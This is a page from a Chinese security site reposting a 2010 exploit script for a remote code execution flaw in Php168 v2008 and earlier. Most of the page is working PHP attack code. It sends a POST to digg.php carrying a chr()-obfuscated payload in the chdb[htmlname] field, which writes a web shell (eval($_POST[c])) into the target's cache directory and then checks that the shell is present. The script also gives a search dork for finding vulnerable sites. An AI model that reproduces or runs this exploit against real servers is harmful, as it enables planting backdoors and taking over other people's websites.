首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
Php168一个即将被补的代码执行?
来源:vfocus.net 作者:vfocus 发布时间:2010-05-26  

据可靠线报,有人已发现此相似漏洞[漏洞虽不一样,但在同一个文件,利用了相同的变量]并发在黑防上了,估计官方很快就会发布补丁了吧,那么我这个exp恐怕也会废掉了:)

#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
Php168 <= v2008 remote code execution exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PHP168"
+---------------------------------------------------------------------------+
');
/**
* works regardless of php.ini settings
*/
if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to php168
Example:
php '.$argv[0].' localhost /php168/
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];

$cmd = 'makehtml=1&chdb[htmlname]=${${fputs(fopen(chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(119).chr(111).chr(108).chr(118).chr(101).chr(122).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(62).chr(112).chr(117).chr(114).chr(101).chr(116).chr(95).chr(116))}}';
$shell = 'http://'.$host.$path.'cache/wolvez.php';
/**
* wolvez.php has this code:
* <?eval($_POST[c])?>
*/
send($cmd);

if (!file_get_contents($url) && file_get_contents($shell) == 'puret_t')
    exit("Expoilt Success!\nView Your shell:\t$shell\n");
else
    exit("Exploit Failed!\n");
   
function send($cmd)
{
    global $host, $path;
   
    $message = "POST ".$path."digg.php  HTTP/1.1\r\n";
    // $message = "POST ".$path."login.php  HTTP/1.1\r\n";
    // $message = "POST ".$path."search.php  HTTP/1.1\r\n";
    // $message = "POST ".$path."sendpwd.php  HTTP/1.1\r\n";
    // $message = "POST ".$path."showsp.php  HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: http://$host$path\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Content-Length: ".strlen($cmd)."\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $cmd;
   
    $fp = fsockopen($host, 80);
    fputs($fp, $message);
   
    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);
   
    return $resp;
}

?>

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·DEDECMS v5.5 GBK Final 的一个
·IIS源码泄露及文件类型解析错误
·nginx文件类型错误解析漏洞
·Discuz! 6.x/7.x 全局变量防御绕
·New Includes Function -- spl_a
·当magic_quotes_gpc=off
·关于magic_quotes_sybase
·ZIP 文件溢出漏洞
·[CAL-20100204-3]Adobe Shockwav
·[CAL-20100204-2]Adobe Shockwav
·[CAL-20100204-1]Adobe Shockwav
·DedeCms V5.6 plus/advancedsear
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved